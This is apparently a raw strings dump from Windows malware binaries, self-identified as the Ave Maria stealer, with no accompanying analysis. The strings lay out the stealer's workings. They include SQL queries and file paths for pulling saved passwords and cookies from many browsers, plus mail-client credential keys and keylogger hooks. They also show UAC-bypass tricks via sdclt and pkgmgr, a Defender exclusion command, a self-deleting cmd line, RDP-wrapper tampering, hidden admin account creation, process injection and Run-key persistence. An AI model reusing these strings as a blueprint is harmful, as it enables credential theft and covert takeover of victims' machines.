!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
9p<tah
QQSVWh
?vMj@_+
\$$PSSS
PWWWWQ
;_,s8VPS
PPPWPPV
WWWWWWWWWW
9\$@t+
VVVVVV
SSSSSS
PVVVVV
SSSSPVh
QQWSPVQh
SSSSPVh
QQWSPVQh
:MjZXu
FVSSh(
QQSVWj
t VVSPj
u2Vj h
*WWWWWWWj
D$(uBj
u=hP0U
QQVWhP0U
PSSSSSSh
tG;HtsB
f99t.+
QQSVWQ
TSVjD3
RSSSSSSQ
PWVWWWSh
PWWWWWW
QQSVWh
QQSVWj
QQVPQQ
9\$dt
9\$@t;
127.0.0.2
shutdown.exe /r /t 00
shutdown.exe /r /f /t 00
RtlAdjustPrivilege
ntdll.dll
NtRaiseHardError
cmd.exe /C ping 1.2.3.4 -n 4 -w 1000 > Nul & cmd.exe /C
\cookies.sqlite
\Microsoft\Edge\User Data\Default\cookies
\Microsoft\Windows\INetCookies
\Microsoft\Windows\Cookies
abcdefghijklmnopqrstuvwxyzABCDEFGHIJK...
Ws2_32.dll
connect
nevergonnagiveyouup
USER32.DLL
MessageBoxA
Assert
An assertion condition failed
PureCall
A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application
microsoft.com
GET http://microsoft.com/ HTTP/1.1
Host: microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
XXXXXX
\System32\cmd.exe
LdrGetProcedureAddress
RtlNtStatusToDosError
RtlSetLastWin32Error
NtAllocateVirtualMemory
NtProtectVirtualMemory
NtWriteVirtualMemory
LdrLoadDll
RtlCreateUserThread
GetRawInputData
ToUnicode
MapVirtualKeyA
c:\windows\system32\user32.dll
SetWindowsHookExA
select signon_realm, origin_url, username_value, password_value from wow_logins
select signon_realm, origin_url, username_value, password_value from logins
select host_key, path, name, encrypted_value, expires_utc, is_httponly, samesite, is_secure from cookies
SELECT host, path, name, value, expiry, isHttpOnly, isSecure FROM moz_cookies
NSS_Init
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
NSSBase64_DecodeBuffer
PK11_CheckUserPassword
NSS_Shutdown
PK11_FreeSlot
PR_GetError
vaultcli.dll
VaultOpenVault
VaultCloseVault
VaultEnumerateItems
VaultGetItem
VaultFree
encryptedUsername
hostname
encryptedPassword
sqlite3_open
sqlite3_close
sqlite3_prepare_v2
sqlite3_column_text
sqlite3_column_int
sqlite3_column_int64
sqlite3_column_count
sqlite3_data_count
sqlite3_step
sqlite3_exec
sqlite3_open_v2
sqlite3_column_blob
sqlite3_column_type
sqlite3_column_bytes
sqlite3_close_v2
sqlite3_finalize
Storage
Accounts\Account.rec0
software\Aerofox\FoxmailPreview
Executable
UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
127.0.0.1
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
RtlGetVersion
K.$RtlCreateUnicodeStringFromAsciiz
RtlInitAnsiString
IsWow64Process
kernel32
VirtualQuery
cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
Software\Classes\Folder\shell\open\command
DelegateExecute
cmd.exe /C C:\Windows\System32\sdclt.exe
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
explorer.exe
powershell Add-MpPreference -ExclusionPath
find.exe
find.db
-w %ws -d C -f %s
Software\Microsoft\Windows\CurrentVersion\Internet Settings
MaxConnectionsPer1_0Server
MaxConnectionsPerServer
BQAaR$43!QAFff
?lst@@YAXHJ@Z
gqw|:1
.text$di
.text$mn
.text$yd
.idata$5
.rdata
.rdata$voltmd
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.CRT$XCA
.CRT$XCU
.CRT$XCZ
.rsrc$01
.rsrc$02
WsFileTimeToDateTime
webservices.dll
BCryptDecrypt
BCryptOpenAlgorithmProvider
BCryptSetProperty
BCryptGenerateSymmetricKey
bcrypt.dll
CreateDirectoryW
GetModuleFileNameA
SetLastError
VirtualFree
GetTempPathW
GetModuleHandleA
GetPrivateProfileStringW
GetLastError
LoadLibraryA
lstrcatW
CloseHandle
GetProcAddress
ExitProcess
WinExec
CreateProcessA
lstrcmpW
lstrlenW
ExpandEnvironmentStringsW
lstrlenA
lstrcmpA
lstrcatA
MultiByteToWideChar
lstrcpyA
WideCharToMultiByte
lstrcpyW
GetTickCount
HeapAlloc
GetProcessHeap
GetCommandLineA
GetStartupInfoA
HeapFree
VirtualAlloc
HeapReAlloc
VirtualQuery
LocalAlloc
LocalFree
SystemTimeToFileTime
TerminateThread
CreateThread
WriteProcessMemory
GetCurrentProcess
OpenProcess
GetWindowsDirectoryA
VirtualProtectEx
VirtualAllocEx
CreateRemoteThread
GetModuleHandleW
IsWow64Process
WriteFile
CreateFileW
LoadLibraryW
GetLocalTime
GetCurrentThreadId
GetCurrentProcessId
ReadFile
FindFirstFileA
GetBinaryTypeW
FindNextFileA
GetFullPathNameA
CreateFileA
GlobalAlloc
GetCurrentDirectoryW
SetCurrentDirectoryW
GetFileSize
FreeLibrary
SetDllDirectoryW
GetFileSizeEx
WaitForSingleObject
WaitForMultipleObjects
CreatePipe
PeekNamedPipe
DuplicateHandle
SetEvent
CreateProcessW
CreateEventA
GetModuleFileNameW
LoadResource
FindResourceW
GetComputerNameW
GlobalMemoryStatusEx
LoadLibraryExW
FindFirstFileW
FindNextFileW
SetFilePointer
GetLogicalDriveStringsW
CopyFileW
GetDriveTypeW
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSection
DeleteCriticalSection
CreateMutexA
ReleaseMutex
TerminateProcess
K32GetModuleFileNameExW
CreateToolhelp32Snapshot
Process32NextW
Process32FirstW
DeleteFileW
SizeofResource
VirtualProtect
GetSystemDirectoryW
LockResource
GetWindowsDirectoryW
Process32First
Process32Next
GetTempPathA
KERNEL32.dll
CharLowerW
wsprintfW
wsprintfA
GetWindowTextW
GetForegroundWindow
GetLastInputInfo
PostQuitMessage
GetKeyNameTextW
ToUnicode
TranslateMessage
RegisterRawInputDevices
DefWindowProcA
MapVirtualKeyA
GetRawInputData
RegisterClassW
GetAsyncKeyState
CallNextHookEx
CreateWindowExW
DispatchMessageA
GetMessageA
GetKeyState
USER32.dll
RegQueryValueExW
RegOpenKeyExW
RegOpenKeyExA
RegEnumKeyExW
RegQueryValueExA
RegQueryInfoKeyW
RegCloseKey
OpenServiceW
ChangeServiceConfigW
QueryServiceConfigW
EnumServicesStatusExW
StartServiceW
RegSetValueExW
RegCreateKeyExA
OpenSCManagerW
CloseServiceHandle
GetTokenInformation
LookupAccountSidW
FreeSid
OpenProcessToken
AllocateAndInitializeSid
AdjustTokenPrivileges
LookupPrivilegeValueW
RegDeleteValueW
RegSetValueExA
RegCreateKeyExW
RegDeleteKeyW
InitializeSecurityDescriptor
RegDeleteKeyA
SetSecurityDescriptorDacl
ADVAPI32.dll
ShellExecuteW
SHGetFolderPathW
SHCreateDirectoryExW
SHGetSpecialFolderPathW
SHFileOperationW
SHGetKnownFolderPath
ShellExecuteExA
SHELL32.dll
URLDownloadToFileW
urlmon.dll
getaddrinfo
freeaddrinfo
WSAConnect
InetNtopW
WS2_32.dll
CoInitialize
CoCreateInstance
CoInitializeSecurity
CoUninitialize
CoTaskMemFree
ole32.dll
PathFindExtensionW
StrStrA
PathFindFileNameW
PathCombineA
PathRemoveFileSpecA
StrStrW
PathFileExistsW
SHLWAPI.dll
NetLocalGroupAddMembers
NetUserAdd
NETAPI32.dll
OLEAUT32.dll
CryptStringToBinaryA
CryptUnprotectData
CryptStringToBinaryW
CRYPT32.dll
InternetTimeToSystemTimeA
WININET.dll
PPPPPPPS
PPPPPPPS
PPPPPPPS
!This program cannot be run in DOS mode.
`.rdata
@.data
u*hh;@
VWh@"@
RtlGetCurrentPeb
RtlEnterCriticalSection
RtlLeaveCriticalSection
RtlInitUnicodeString
RtlFillMemory
NtAllocateVirtualMemory
LdrEnumerateLoadedModules
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
<servicing>
<package action="install">
<assemblyIdentity name="Package_1_for_KB929761" version="6.0.1.1" language="neutral" processorArchitecture="x86" publicKeyToken="31bf3856ad364e35"/>
<source location="%configsetroot%\Windows6.0-KB929761-x86.CAB" />
</package>
</servicing>
</unattend>
.text$mn
.idata$5
.00cfg
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
SizeofResource
WriteFile
GetModuleFileNameW
GetTempPathW
WaitForSingleObject
CreateFileW
GetSystemDirectoryW
lstrcatW
LockResource
CloseHandle
LoadLibraryW
LoadResource
FindResourceW
GetWindowsDirectoryW
GetProcAddress
ExitProcess
KERNEL32.dll
MessageBoxW
USER32.dll
SHCreateItemFromParsingName
ShellExecuteExW
SHELL32.dll
CoInitialize
CoUninitialize
CoCreateInstance
CoGetObject
ole32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
!This program cannot be run in DOS mode.
/Rich3
`.rdata
@.data
.reloc
.text$mn
.idata$5
.00cfg
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
GetStartupInfoW
ExpandEnvironmentStringsW
TerminateProcess
OpenProcess
CreateToolhelp32Snapshot
Process32NextW
Process32FirstW
CloseHandle
ExitProcess
CreateProcessW
lstrcmpW
KERNEL32.dll
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
PathFindFileNameW
SHLWAPI.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
IsProcessorFeaturePresent
1)1E1U1[1n1
2(212<2C2c2i2o2u2{2
3.373F3
X0`0d0,181
0#0-030C0c0j0r0y0
3*353;3B3I3P3[3f3p3{3
?'?E?c?
50^0|0
7F:i;j?
132<2\2
4A4J4m4r4y4
5.5J5v5}5
5<6b6z6
:>:X:z:
>*>8>J>
3 3?3Z3g3z3
:!:;:E:N:X:d:k:w:~:
<H=R=Y=e=l=
8p8w8n9
;0\0y0
1$1>1[1
2N3U3k3r3
9 9%9,9>9h9
:Y=`=g=o=t={=
>:>@>G>Q>a>h>
>'?8?Z?a?k?r?|?
1/2M2e2
< </<S<t<
8[9a9h9n9
9*:3:Y:j:p:
< <,<8<I<b<h<r<
<G=_=d=n=x=
>]>g>q>{>
? ?O?T?Y?l?q?v?
0!0D0I0N0[0`0e0r0|0
1!1-1115191=1A1E1I1M1Q1k1
2?2a2f2
3 3-363
4(4T4|4
5G5_5f5
6#6+61666A6W6a6y6~6
;1;K;x;
</<9<Q<f<
= =&=,=4=?=E=J=O=[=q=|=
>(>.>3>A>F>M>S>Y>`>m>r>~>
?]?h?s?
1I2T2h2r2{2
4 4%4,4
6*6/6?6O6_6o6
8L8]8r8
=9>@>N>
!0=0w0
4F4^4t4
5C5\5~5
526I6N6f6
< =&>s>z>
0&0?0X0q0
2)2?2U2k2
545:5E5[5w5
6;7Q7V7d7j7
8 909Z9
;+;A;W;v;
<?<[<x<
=1=f=v=
>%>*>5>@>E>T>Y>^>k>v>{>
?&?B?N?a?
0%020o0x0
425[5p5
;&;<;m;
;H<_<t<
> >H?^?
1 2(2/252N2d2j2p2~2
3!3'3/363>3E3L3S3Z3
4$5J5`5{5
646?6K6P6X6m6
;*<P<a<r<
=3=L=V=c=j=p=u=
>+>D>R>l>u>
?$?3?=?^?i?|?
132K2v2
2J3p3-4P4V4k4
8,878f8 989D9N9\9m9y9
:D<%=6=
>G?N?p?w?
0 0B0S0b0x0
1&1,10161A1N1h1
3-32383J3O3n3
4%4=4d4z4
5 5$5.5<5G5
8R8X8f8q8
9 :+:2:7:<:A:G:K:R:]:
: ;%;,;2;H;R;t;
<<<E<i<
>X>a>l>
?(?=?z?
2!323h3
4%4=4Z4
5/595b5s5
:.:H:o:
;*;H;V;
<+=A=p=
=G>_>x>
?2?B?g?w?
0#0+060B0M0b0j0z0
9+9C9I9v9
>[>v>c?
0B0W0]0m0z0
3,3J3x3
7+767A7Y7d7
848G8U8\8n8
999D9N9X9_9
96:A:N:h:m:z:
; ;';4;M;X;_;
<D<_<e<
=V>i>z>
>4?;?]?k?r?z?
0 070T0^0u0
4/4:4@4O4U4_4e4i4
8N8V8j8y8
:):6:M:
;(;0;G;f;y=
> >4>A>^>w>`?
282J2Q2z2
2,313>3
5K6P6^6m6
:!:+:::@:O:j:t:
;*;E;O;Z;`;l;
<!<&<+<0<5<:<?<D<I<N<S<X<]<b<g<l<q<v<{<
=,=I=h=
1$1+1/151?1I1S1]1g1q1{1
4L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8\8`8d8h8l8
9 9$9(9
0 0$0(0P1T1X5
\Microsoft Vision\
\Documents:ApplicationData
Local\Google\Chrome\User Data\Default\Network\Cookies
\Mozilla\Firefox\
profiles.ini
Profile
ntdll.dll
dUser32.dll
ExplorerIdentifier
%02d-%02d-%02d_%02d.%02d.%02d
Unknow
{Unknown}
[ENTER]
[BKSP]
[CTRL]
[CAPS]
Profile %d
Default
\Google\Chrome\User Data\Local State
\Google\Chrome\User Data\Default\Network\Cookies
\Google\Chrome\User Data\Default\Login Data
\Google\Chrome Beta\User Data\Local State
\Google\Chrome Beta\User Data\Default\Login Data
\Epic Privacy Browser\User Data\Local State
\Epic Privacy Browser\User Data\Default\Login Data
\Microsoft\Edge\User Data\Local State
\Microsoft\Edge\User Data\Default\Login Data
\UCBrowser\User Data_i18n\Local State
\UCBrowser\User Data_i18n\Default\UC Login Data.17
\Tencent\QQBrowser\User Data\Local State
\Tencent\QQBrowser\User Data\Default\Login Data
\Opera Software\Opera Stable\Local State
\Opera Software\Opera Stable\Login Data
\Blisk\User Data\Local State
\Blisk\User Data\Default\Login Data
\Chromium\User Data\Local State
\Chromium\User Data\Default\Login Data
\BraveSoftware\Brave-Browser\User Data\Local State
\BraveSoftware\Brave-Browser\User Data\Default\Login Data
\Vivaldi\User Data\Local State
\Vivaldi\User Data\Default\Login Data
\Comodo\Dragon\User Data\Local State
\Comodo\Dragon\User Data\Default\Login Data
\Torch\User Data\Local State
\Torch\User Data\Default\Login Data
\Slimjet\User Data\Local State
\Slimjet\User Data\Default\Login Data
\CentBrowser\User Data\Local State
\CentBrowser\User Data\Default\Login Data
Software\Microsoft\Windows\CurrentVersion\App Paths\
softokn3.dll
msvcp140.dll
mozglue.dll
vcruntime140.dll
freebl3.dll
nss3.dll
msvcr120.dll
msvcp120.dll
Internet Explorer
firefox.exe
\firefox.exe
\logins.json
thunderbird.exe
\Thunderbird\
Could not decrypt
Account Name
POP3 Server
POP3 User
SMTP Server
POP3 Password
SMTP Password
HTTP Password
IMAP Password
Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
ChainingModeGCM
ChainingMode
"os_crypt":{"encrypted_key":"
TermService
%ProgramFiles%
%windir%\System32
%ProgramW6432%
\Microsoft DN1
\rfxvmt.dll
\rdpwrap.ini
\sqlmap.dll
SeDebugPrivilege
%SystemRoot%\System32\termsrv.dll
SYSTEM\CurrentControlSet\Services\TermService\Parameters
ServiceDll
SYSTEM\CurrentControlSet\Services\TermService
ImagePath
svchost.exe
svchost.exe -k
CertPropSvc
SessionEnv
ServicesActive
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns
SYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip Redirector
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC
fDenyTSConnections
EnableConcurrentSessions
AllowMultipleTSSessions
RDPClip
A\cmd.exe
ASOFTWARE\Microsoft\Cryptography
MachineGuid
root\CIMV2
SELECT Name FROM Win32_VideoController
Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\
InitWindows
Software\Microsoft\Windows\CurrentVersion\Run\
:Zone.Identifier
\programs.bat
for /F "usebackq tokens=*" %%A in ("
:start
") do %%A
wmic process call create '"
SOFTWARE\_rptls
Install
\System32\cmd.exe
WM_DSP
e\sdclt.exe
ADescription
FriendlyName
Source
Grabber
Asend.db
WM_DSP
ntdll.dll
Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
explorer.exe
\explorer.exe
WM_DISP
dismcore.dll
ellocnak.xml
\pkgmgr.exe
/n:%temp%\ellocnak.xml
Hey I'm Admin
WM_DISP
SOFTWARE\_rptls
Install
%systemroot%\system32\